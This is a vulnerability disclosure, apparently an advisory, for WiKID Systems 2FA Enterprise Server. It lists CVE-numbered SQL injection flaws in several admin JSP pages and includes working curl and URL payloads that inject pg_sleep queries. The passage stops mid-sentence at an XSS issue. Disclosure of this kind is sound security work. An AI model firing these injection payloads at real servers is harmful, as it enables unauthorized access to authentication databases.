WiKID Systems 2FA Enterprise Serverversion 4.2.0-b2032 and earlier was found to be vulnerable to multiple Cross-Site Scripting, SQLi, and CSRF issues. *searchDevices.jsp* is vulnerable to SQL injection through the *uid* and *domain* parameters. The application uses Postgres which supports Stacked Queries, the issue can be seen by submitting a request like: SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp The request will cause the database to sleep for 10+ seconds. This issue has been assigned *CVE-2019-16917*. *processPref.jsp* is vulnerable to SQL injection through the *key* parameter if the action parameter is set to *update.* The following request will trigger the issue for an authenticated user: https://$RHOST/WiKIDAdmin/processPref.jsp?action=Update&key=test%27;%20SELECT%20pg_sleep(5);-- The request will cause the database to sleep for 5+ seconds. This issue has been assigned *CVE-2019-17117.* *Logs.jsp* is vulnerable to SQL injection through the *substring *and *source* parameters. The following request will demonstrate the issue: time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "source='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp real 0m10.572s user 0m0.008s sys 0m0.016s The request will cause the database to sleep for 5+ seconds. This issue has been assigned *CVE-2019-17119* *usrPreregistration.jsp *is vulnerable to cross site scripting by uploading a malicious .csv file containing